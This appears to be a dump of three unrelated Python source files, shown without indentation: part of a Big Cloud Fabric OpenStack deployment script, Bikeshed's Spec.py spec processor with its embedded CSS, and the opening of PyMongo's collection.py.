# ivs is OK. check version
ivs_version = Helper.check_ivs_version(node)
all_service_status = (all_service_status +
' | IVS version ' + ivs_version)
else:
# ivs not OK
all_service_status = (all_service_status +
' | IVS ' + ivs_status)
# check neutron-bsn-agent status
bsn_agent_status = Helper.check_os_service_status(
node, "neutron-bsn-agent")
all_service_status = (all_service_status +
' | BSN Agent ' + bsn_agent_status)
# after forming the complete string, put in respective list
if ":-(" not in all_service_status:
node_pass[node.fqdn] = all_service_status
else:
node_fail[node.fqdn] = all_service_status
q.task_done()
def upgrade_bcf(node_dic):
for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.os == const.CENTOS:
Helper.generate_upgrade_scripts_for_centos(node)
elif node.os == const.UBUNTU:
Helper.generate_upgrade_scripts_for_ubuntu(node)
elif node.os == const.REDHAT:
Helper.generate_upgrade_scripts_for_redhat(node)
node_q.put(node)
with open(const.LOG_FILE, "a") as log_file:
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
# Use multiple threads to setup compute nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_upgrade_or_sriov_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
def setup_sriov(node_dic):
for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.role != const.ROLE_SRIOV:
safe_print("Skipping node %(hostname)s because deployment mode is "
"SRIOV and role set for node is not SRIOV. It is "
"%(role)s\n" %
{'hostname': hostname, 'role': node.role})
continue
if node.os != const.REDHAT:
safe_print("Skipping node %(hostname)s because deployment mode is "
"SRIOV and non REDHAT OS is not supported. OS set for "
"node is %(os)s\n" %
{'hostname': hostname, 'os': node.os})
continue
# all okay, generate scripts for node
Helper.generate_sriov_scripts_for_redhat(node)
node_q.put(node)
with open(const.LOG_FILE, "a") as log_file:
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
# Use multiple threads to setup nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_upgrade_or_sriov_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
def setup_dpdk(node_dic):
for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.role not in const.DPDK_ROLES:
safe_print("Skipping node %(hostname)s because deployment mode is "
"DPDK and role set for node is not DPDK. It is "
"%(role)s\n" %
{'hostname': hostname, 'role': node.role})
continue
if node.os != const.REDHAT:
safe_print("Skipping node %(hostname)s because deployment mode is "
"DPDK and non REDHAT OS is not supported. OS set for "
"node is %(os)s\n" %
{'hostname': hostname, 'os': node.os})
continue
# all okay, generate scripts for node
Helper.generate_dpdk_scripts_for_redhat(node)
node_q.put(node)
with open(const.LOG_FILE, "a") as log_file:
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
# Use multiple threads to setup nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_upgrade_or_sriov_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
def deploy_bcf(config, mode, fuel_cluster_id, rhosp, tag, cleanup,
verify, verify_only, skip_ivs_version_check,
certificate_dir, certificate_only, generate_csr,
support, upgrade_dir, offline_dir, sriov, dpdk):
# Deploy setup node
safe_print("Start to prepare setup node\n")
env = Environment(config, mode, fuel_cluster_id, rhosp, tag, cleanup,
skip_ivs_version_check, certificate_dir, upgrade_dir,
offline_dir, sriov, dpdk)
Helper.common_setup_node_preparation(env)
controller_nodes = []
# Generate detailed node information
safe_print("Start to setup Big Cloud Fabric\n")
nodes_yaml_config = config['nodes'] if 'nodes' in config else None
node_dic = Helper.load_nodes(nodes_yaml_config, env)
if upgrade_dir:
return upgrade_bcf(node_dic)
if sriov:
return setup_sriov(node_dic)
if dpdk:
return setup_dpdk(node_dic)
if generate_csr:
safe_print("Start to generate csr for virtual switches.\n")
# create ~/csr and ~/key directory
Helper.run_command_on_local("mkdir -p %s" % const.CSR_DIR)
Helper.run_command_on_local("mkdir -p %s" % const.KEY_DIR)
for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.deploy_mode == const.T6 and node.role == const.ROLE_COMPUTE:
Helper.generate_csr(node)
safe_print("Finish generating csr for virtual switches.\n")
return
# copy neutron config from neutron server to setup node
for hostname, node in node_dic.iteritems():
if node.role == const.ROLE_NEUTRON_SERVER:
controller_nodes.append(node)
Helper.copy_neutron_config_from_controllers(controller_nodes)
# check if vlan is the tenant network type for fuel environment
if not Helper.check_if_vlan_is_used(controller_nodes):
safe_print("tenant network type is not vlan. Stop deploying.\n")
return
# prepare keystone client from /etc/neutron/api-paste.ini
#Helper.prepare_keystone_client(controller_nodes)
# Generate scripts for each node
for hostname, node in node_dic.iteritems():
if support:
support_node_q.put(node)
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.os == const.CENTOS:
Helper.generate_scripts_for_centos(node)
elif node.os == const.UBUNTU:
Helper.generate_scripts_for_ubuntu(node)
elif node.os == const.REDHAT:
Helper.generate_scripts_for_redhat(node)
if node.role == const.ROLE_NEUTRON_SERVER:
controller_node_q.put(node)
else:
# python doesn't have deep copy for Queue, hence add to all
node_q.put(node)
verify_node_q.put(node)
if node.deploy_mode == const.T6 and node.role == const.ROLE_COMPUTE:
certify_node_q.put(node)
if node.rhosp:
Helper.chmod_node(node)
with open(const.LOG_FILE, "a") as log_file:
version = Helper.run_command_on_local("pip show bosi")
log_file.write(str(version))
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
if support:
safe_print("Start to collect logs.\n")
# copy installer logs to ~/support
Helper.run_command_on_local("mkdir -p %s" % const.SUPPORT_DIR)
Helper.run_command_on_local("cp -r %(src)s %(dst)s" %
{"src": const.LOG_FILE,
"dst": const.SUPPORT_DIR})
Helper.run_command_on_local("cp -r %(setup_node_dir)s/%(generated_script_dir)s %(dst)s" %
{"setup_node_dir": env.setup_node_dir,
"generated_script_dir": const.GENERATED_SCRIPT_DIR,
"dst": const.SUPPORT_DIR})
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=support_node_setup,
args=(support_node_q,))
t.daemon = True
t.start()
support_node_q.join()
# compress ~/support
Helper.run_command_on_local("cd /tmp; tar -czf support.tar.gz support")
safe_print("Finish collecting logs. logs are at /tmp/support.tar.gz.\n")
return
# in case of verify_only or certificate_only, do not deploy
if (not verify_only) and (not certificate_only):
# Use single thread to setup controller nodes
t = threading.Thread(target=worker_setup_node,
args=(controller_node_q,))
t.daemon = True
t.start()
controller_node_q.join()
# Use multiple threads to setup compute nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_setup_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
if certificate_dir or certificate_only:
# certify each node
safe_print("Start to certify virtual switches.\n")
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=certify_node_setup,
args=(certify_node_q,))
t.daemon = True
t.start()
certify_node_q.join()
safe_print('Certifying virtual switches done.\n')
if verify or verify_only:
# verify each node and post results
safe_print("Verifying deployment for all compute nodes.\n")
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=verify_node_setup,
args=(verify_node_q,))
t.daemon = True
t.start()
verify_node_q.join()
# print status
# success nodes
safe_print('Deployed successfully to: \n')
for node_element in node_pass:
safe_print(node_element + '\n')
# failed nodes
safe_print('Deployment to following failed: \n')
for node_element in node_fail:
safe_print(str(node_element) + ' : '
+ str(node_fail[node_element]) + '\n')
def main():
# Parse configuration
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config-file", required=True,
help="BCF YAML configuration file")
parser.add_argument("-m", "--deploy-mode", required=False,
choices=['pfabric', 'pvfabric']),
parser.add_argument('-f', "--fuel-cluster-id", required=False,
help=("Fuel cluster ID. Fuel settings may override "
"YAML configuration. "
"Please refer to config.yaml"))
parser.add_argument('-r', "--rhosp", action='store_true', default=False,
help="red hat openstack director is the installer "
"(upgrade only supported).")
parser.add_argument('-t', "--tag", required=False,
help="Deploy to tagged nodes only.")
parser.add_argument('--cleanup', action='store_true', default=False,
help="Clean up existing routers, "
"networks and projects.")
parser.add_argument('--skip-ivs-version-check', action='store_true',
default=False, help="Skip ivs version check.")
parser.add_argument('--verify', action='store_true', default=False,
help="Verify service status for compute nodes "
"after deployment.")
parser.add_argument('--verifyonly', action='store_true', default=False,
help=("Verify service status for compute nodes "
"after deployment. Does not deploy BCF "
"specific changes."))
parser.add_argument('--certificate-dir', required=False,
help=("The directory that has the certificates for "
"virtual switches. This option requires certificates "
"to be ready in the directory. This option will deploy "
"certificate to the corresponding node based on the mac "
"address. Virtual switch will talk TLS afterward."))
parser.add_argument('--certificate-only', action='store_true', default=False,
help=("By turning on this flag, bosi will only deploy certificate "
"to each node. It requires --certificate-dir to be specified."))
parser.add_argument('--generate-csr', action='store_true', default=False,
help=("By turning on this flag, bosi will generate csr on behalf of "
"virtual switches. User needs to certify these csr and use "
"--certificate-dir to specify the certificate directory."))
parser.add_argument('--support', action='store_true', default=False,
help=("Collect openstack logs."))
parser.add_argument('--upgrade-dir', required=False,
help=("The directory that has the packages for upgrade."))
parser.add_argument('--offline-dir', required=False,
help=("The directory that has the packages for offline installation."))
parser.add_argument('--sriov', action='store_true', default=False,
help=("Deploy changes necessary for SRIOV mode to "
"nodes specified in config.yaml. Only works "
"with RHOSP."))
parser.add_argument('--dpdk', action='store_true', default=False,
help=("Deploy changes necessary for DPDK mode to "
"nodes specified in config.yaml. Only works "
"with RHOSP in pfabric mode."))
args = parser.parse_args()
if args.fuel_cluster_id and args.rhosp:
safe_print("Cannot have both fuel and rhosp as openstack installer.\n")
return
if args.rhosp and not (args.upgrade_dir or args.sriov or args.dpdk):
safe_print("BOSI for RHOSP only supports upgrading packages or "
"SRIOV/DPDK deployment.\n"
"Please specify --upgrade-dir or --sriov or --dpdk.\n")
return
if args.rhosp and args.dpdk:
if args.deploy_mode != 'pfabric':
safe_print("BOSI for RHOSP DPDK is only supported in pfabric "
"mode. \n"
"Please change deployment mode to pfabric.")
return
if args.offline_dir and args.upgrade_dir:
safe_print("Cannot have both --offline-dir and --upgrade-dir. Please specify one.")
return
if args.certificate_only and (not args.certificate_dir):
safe_print("--certificate-only requires the existence of --certificate-dir.\n")
return
if args.sriov and not args.rhosp:
safe_print("SRIOV is only supported for RHOSP. \n"
"Please specify --rhosp.")
with open(args.config_file, 'r') as config_file:
config = yaml.load(config_file)
deploy_bcf(config, args.deploy_mode, args.fuel_cluster_id, args.rhosp,
args.tag, args.cleanup,
args.verify, args.verifyonly,
args.skip_ivs_version_check,
args.certificate_dir, args.certificate_only,
args.generate_csr, args.support,
args.upgrade_dir, args.offline_dir, args.sriov, args.dpdk)
if __name__ == '__main__':
main()
|
Spec.py
|
# -*- coding: utf-8 -*-
import glob
import io
import sys
import os
from collections import defaultdict, OrderedDict
from datetime import datetime
from . import biblio
from . import boilerplate
from . import caniuse
from . import mdnspeclinks
from . import config
from . import constants
from . import datablocks
from . import extensions
from . import fingerprinting
from . import headings
from . import highlight
from . import html
from . import idl
from . import includes
from . import inlineTags
from . import lint
from . import markdown
from . import metadata
from . import shorthands
from . import wpt
from .html import *
from .InputSource import InputSource, FileInputSource, StdinInputSource
from .Line import Line
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class Spec(object):
def __init__(self, inputFilename, debug=False, token=None, lineNumbers=False, fileRequester=None, testing=False):
self.valid = False
self.lineNumbers = lineNumbers
if lineNumbers:
# line-numbers are too hacky, so force this to be a dry run
constants.dryRun = True
if inputFilename is None:
inputFilename = findImplicitInputFile()
if inputFilename is None: # still
die("No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN.")
return
self.inputSource = InputSource(inputFilename)
self.debug = debug
self.token = token
self.testing = testing
if fileRequester is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = fileRequester
self.valid = self.initializeState()
def initializeState(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(fileRequester=self.dataFile, testing=self.testing)
self.externalRefsUsed = defaultdict(lambda:defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles['style-md-lists'] = styleMdLists
self.extraStyles['style-autolinks'] = styleAutolinks
self.extraStyles['style-selflinks'] = styleSelflinks
self.extraStyles['style-counters'] = styleCounters
self.extraScripts = defaultdict(str)
try:
inputContent = self.inputSource.read()
self.lines = inputContent.lines
if inputContent.date is not None:
self.mdBaseline.addParsedData("Date", inputContent.date)
except OSError:
die("Couldn't find the input file at the specified location '{0}'.", self.inputSource)
return False
except IOError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def preprocess(self):
self.assembleDocument()
self.processDocument()
return self
def assembleDocument(self):
# Textual hacks
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
# Extract and process metadata
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
# First load the metadata sources from 'local' data
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
# Using that to determine the Group and Status, load the correct defaults.include boilerplate
self.mdDefaults = metadata.fromJson(data=config.retrieveBoilerplateFile(self, 'defaults', error=True), source="defaults")
self.md = metadata.join(self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine)
# Using all of that, load up the text macros so I can sub them into the computed-metadata file.
self.md.fillTextMacros(self.macros, doc=self)
jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k,v in self.macros.items()}
computedMdText = replaceMacros(config.retrieveBoilerplateFile(self, 'computed-metadata', error=True), macros=jsonEscapedMacros)
self.mdOverridingDefaults = metadata.fromJson(data=computedMdText, source="computed-metadata")
self.md = metadata.join(self.mdBaseline, self.mdDefaults, self.mdOverridingDefaults, self.mdDocument, self.mdCommandLine)
# Finally, compute the "implicit" things.
self.md.computeImplicitMetadata(doc=self)
# And compute macros again, in case the preceding steps changed them.
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
# Initialize things
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
# Deal with further <pre> blocks, and markdown
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(self.lines, self.md.indent, opaqueElements=self.md.opaqueElements, blockElements=self.md.blockElements)
# Note that, currently, markdown.parse returns an array of strings, not of Line objects.
self.refs.setSpecData(self.md)
# Convert to a single string of html now, for convenience.
self.html = ''.join(l.text for l in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
# Build the document
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
return self
def processDocument(self):
# Fill in and clean up a bunch of data
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
shorthands.transformShorthandElements(self)
shorthands.transformProductionPlaceholders(self)
shorthands.transformMaybePlaceholders(self)
shorthands.transformAutolinkShortcuts(self)
shorthands.transformProductionGrammars(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
wpt.processWptElements(self)
# Handle all the links
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
fillAttributeInfoSpans(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
mdnspeclinks.addMdnPanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
# Any final HTML cleanups
cleanupHTML(self)
if self.md.prepTR:
# Don't try and override the W3C's icon.
for el in findAll("[rel ~= 'icon']", self):
removeNode(el)
# Make sure the W3C stylesheet is after all other styles.
for el in findAll("link", self):
if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), el)
# Ensure that all W3C links are https.
for el in findAll("a", self):
href = el.get("href", "")
if href.startswith("http://www.w3.org") or href.startswith("http://lists.w3.org"):
el.set("href", "https" + href[4:])
text = el.text or ""
if text.startswith("http://www.w3.org") or text.startswith("http://lists.w3.org"):
el.text = "https" + text[4:]
extensions.BSPrepTR(self)
return self
def serialize(self):
rendered = html.Serializer(self.md.opaqueElements, self.md.blockElements).serialize(self.document)
rendered = finalHackyCleanup(rendered)
return rendered
def fixMissingOutputFilename(self, outputFilename):
if outputFilename is None:
# More sensible defaults!
if not isinstance(self.inputSource, FileInputSource):
outputFilename = "-"
elif self.inputSource.sourceName.endswith(".bs"):
outputFilename = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.endswith(".src.html"):
outputFilename = self.inputSource.sourceName[0:-9] + ".html"
else:
outputFilename = "-"
return outputFilename
def finish(self, outputFilename=None):
self.printResultMessage()
outputFilename = self.fixMissingOutputFilename(outputFilename)
rendered = self.serialize()
if not constants.dryRun:
try:
if outputFilename == "-":
sys.stdout.write(rendered.encode("utf-8"))
else:
with io.open(outputFilename, "w", encoding="utf-8") as f:
f.write(rendered)
except Exception as e:
die("Something prevented me from saving the output document to {0}:\n{1}", outputFilename, e)
def printResultMessage(self):
# If I reach this point, I've succeeded, but maybe with reservations.
fatals = messageCounts['fatal']
links = messageCounts['linkerror']
warnings = messageCounts['warning']
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if fatals:
success("Successfully generated, but fatal errors were suppressed")
return
if links:
success("Successfully generated, with {0} linking errors", links)
return
if warnings:
success("Successfully generated, with warnings")
return
def watch(self, outputFilename, port=None, localhost=False):
import time
outputFilename = self.fixMissingOutputFilename(outputFilename)
if self.inputSource.mtime() is None:
die("Watch mode doesn't support {}".format(self.inputSource))
if outputFilename == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if port:
# Serve the folder on an HTTP server
import http.server
import socketserver
import threading
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(*args):
pass
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(
("localhost" if localhost else "", port), SilentServer)
print("Serving at port {0}".format(port))
thread = threading.Thread(target = server.serve_forever)
thread.daemon = True
thread.start()
else:
server = None
mdCommandLine = self.mdCommandLine
try:
lastInputModified = self.inputSource.mtime()
self.preprocess()
self.finish(outputFilename)
p("==============DONE==============")
try:
while True:
inputModified = self.inputSource.mtime()
if inputModified > lastInputModified:
resetSeenMessages()
lastInputModified = inputModified
formattedTime = datetime.fromtimestamp(inputModified).strftime("%H:%M:%S")
p("Source file modified at {0}. Rebuilding...".format(formattedTime))
self.initializeState()
self.mdCommandLine = mdCommandLine
self.preprocess()
self.finish(outputFilename)
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if server:
server.shutdown()
thread.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def fixText(self, text, moreMacros={}):
# Do several textual replacements that need to happen *before* the document is parsed as HTML.
# If markdown shorthands are on, remove all `foo`s while processing,
# so their contents don't accidentally trigger other stuff.
# Also handle markdown escapes.
if "markdown" in self.md.markupShorthands:
textFunctor = MarkdownCodeSpans(text)
else:
textFunctor = func.Functor(text)
macros = dict(self.macros, **moreMacros)
textFunctor = textFunctor.map(curry(replaceMacros, macros=macros))
textFunctor = textFunctor.map(fixTypography)
if "css" in self.md.markupShorthands:
textFunctor = textFunctor.map(replaceAwkwardCSSShorthands)
return textFunctor.extract()
def printTargets(self):
p("Exported terms:")
for el in findAll("[data-export]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
p("Unexported terms:")
for el in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
def isOpaqueElement(self, el):
if el.tag in self.md.opaqueElements:
return True
if el.get("data-opaque") is not None:
return True
return False
def findImplicitInputFile():
'''
Find what input file the user *probably* wants to use,
by scanning the current folder.
In preference order:
1. index.bs
2. Overview.bs
3. the first file with a .bs extension
4. the first file with a .src.html extension
'''
import glob
import os
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
allBs = glob.glob("*.bs")
if allBs:
return allBs[0]
allHtml = glob.glob("*.src.html")
if allHtml:
return allHtml[0]
return None
constants.specClass = Spec
styleMdLists = '''
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}'''
styleAutolinks = '''
.css.css, .property.property, .descriptor.descriptor {
color: #005a9c;
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}'''
styleSelflinks = '''
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
text-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: gray;
color: white;
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: black;
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }'''
styleCounters = '''
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}'''
|
collection.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
command, it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
